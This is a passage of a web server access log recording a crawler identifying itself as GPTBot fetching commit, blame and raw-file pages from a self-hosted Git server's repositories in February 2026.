AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" -[17/Feb/2026:14:57:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=.Backup%2fhtml%2fcomponents%2fHero.tsx" [Client 74.7.227.38] [Length 25830] [Gzip 4.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Hero.tsx" -[17/Feb/2026:14:57:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/pip" [Client 74.7.227.38] [Length 11547] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin" -[17/Feb/2026:14:57:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/pip" [Client 74.7.227.38] [Length 11512] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin" -[17/Feb/2026:14:57:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2fapp%2fmodels.py" [Client 74.7.227.38] [Length 26357] [Gzip 4.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/models.py" -[17/Feb/2026:14:57:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2fstart.sh" [Client 74.7.227.38] [Length 28375] [Gzip 5.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/start.sh" -[17/Feb/2026:14:57:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2fstatic%2fjs" [Client 74.7.227.38] [Length 37488] [Gzip 7.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/static/js" -[17/Feb/2026:14:57:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2f.gitignore" [Client 74.7.227.38] [Length 25269] [Gzip 4.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.gitignore" -[17/Feb/2026:14:57:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" [Client 74.7.227.38] [Length 322379] [Gzip 27.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" -[17/Feb/2026:14:57:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=npm%2fdata%2flogs%2fletsencrypt-requests_access.log" [Client 74.7.227.38] [Length 22935] [Gzip 3.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt-requests_access.log" -[17/Feb/2026:14:57:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=.Backup%2fhtml%2fassets%2fimages%2fControlRoom4.png" [Client 74.7.227.38] [Length 22744] [Gzip 3.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom4.png" -[17/Feb/2026:14:57:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=.Backup%2fhtml%2fassets%2fimages%2fControlRoom6.png" [Client 74.7.227.38] [Length 22773] [Gzip 3.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom6.png" -[17/Feb/2026:14:57:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=.Backup%2fhtml%2fassets%2fimages%2fControlRoom2.png" [Client 74.7.227.38] [Length 22729] [Gzip 3.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom2.png" -[17/Feb/2026:14:57:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/pip" [Client 74.7.227.38] [Length 265] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/pip" -[17/Feb/2026:14:57:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/pip" [Client 74.7.227.38] [Length 265] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/pip" -[17/Feb/2026:14:57:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=.Backup%2fhtml%2fassets%2fimages%2fControlRoom3.png" [Client 74.7.227.38] [Length 22735] [Gzip 3.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom3.png" -[17/Feb/2026:14:57:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=.Backup%2fhtml%2fassets%2fimages%2fControlRoom1.png" [Client 74.7.227.38] [Length 22743] [Gzip 3.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom1.png" -[17/Feb/2026:14:57:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=.Backup%2fhtml%2fassets%2fimages%2fControlRoom5.png" [Client 74.7.227.38] [Length 22755] [Gzip 3.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom5.png" -[17/Feb/2026:14:57:36 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_upload/main/" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot" -[17/Feb/2026:14:57:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_upload/main/" -[17/Feb/2026:14:57:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?show-outdated=&style=split&whitespace=show-all" [Client 74.7.227.38] [Length 458007] [Gzip 15.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec" -[17/Feb/2026:14:57:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" [Client 74.7.227.38] [Length 9932] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" -[17/Feb/2026:14:57:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?show-outdated=&style=split&whitespace=show-all" [Client 74.7.227.38] [Length 84841] [Gzip 12.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6" -[17/Feb/2026:14:57:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2fapp" [Client 74.7.227.38] [Length 45875] [Gzip 7.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app" -[17/Feb/2026:14:57:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.gitignore?display=source" [Client 74.7.227.38] [Length 11121] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.gitignore" -[17/Feb/2026:14:57:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/index.tsx?display=rendered" [Client 74.7.227.38] [Length 10873] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/index.tsx" -[17/Feb/2026:14:57:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 10932] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build" -[17/Feb/2026:14:57:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 9931] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeCache.txt" -[17/Feb/2026:14:57:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/base_library.zip" [Client 74.7.227.38] [Length 9919] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/base_library.zip" -[17/Feb/2026:14:57:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 9907] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeCache.txt" -[17/Feb/2026:14:57:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/PYZ-00.pyz" [Client 74.7.227.38] [Length 9911] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/PYZ-00.pyz" -[17/Feb/2026:14:57:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/PYZ-00.pyz" [Client 74.7.227.38] [Length 14229638] [Gzip 11.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/PYZ-00.pyz" -[17/Feb/2026:14:57:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/localpycs" [Client 74.7.227.38] [Length 10332] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full" -[17/Feb/2026:14:57:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/Analysis-00.toc" [Client 74.7.227.38] [Length 9890] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/Analysis-00.toc" -[17/Feb/2026:14:57:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/PKG-00.toc" [Client 74.7.227.38] [Length 22117] [Gzip 11.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor" -[17/Feb/2026:14:58:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 21643] [Gzip 15.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeCache.txt" -[17/Feb/2026:14:58:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/base_library.zip" [Client 74.7.227.38] [Length 9893] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/base_library.zip" -[17/Feb/2026:14:58:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/PYZ-00.pyz" [Client 74.7.227.38] [Length 4613369] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/PYZ-00.pyz" -[17/Feb/2026:14:58:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 21642] [Gzip 15.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeCache.txt" -[17/Feb/2026:14:58:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/Analysis-00.toc" [Client 74.7.227.38] [Length 9916] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/Analysis-00.toc" -[17/Feb/2026:14:58:03 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/-" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/xref-AssetPilot.html" -[17/Feb/2026:14:58:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/localpycs" [Client 74.7.227.38] [Length 10370] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3" -[17/Feb/2026:14:58:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/Makefile" [Client 74.7.227.38] [Length 9969] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/Makefile" -[17/Feb/2026:14:58:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 10919] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/localpycs" -[17/Feb/2026:14:58:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 10919] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/localpycs" -[17/Feb/2026:14:58:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 10917] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/localpycs" -[17/Feb/2026:14:58:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 10920] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/localpycs" -[17/Feb/2026:14:58:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 21646] [Gzip 15.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeCache.txt" -[17/Feb/2026:14:58:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/localpycs" [Client 74.7.227.38] [Length 10362] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1" -[17/Feb/2026:14:58:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/Analysis-00.toc" [Client 74.7.227.38] [Length 9918] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/Analysis-00.toc" -[17/Feb/2026:14:58:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/Analysis-00.toc" [Client 74.7.227.38] [Length 9916] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 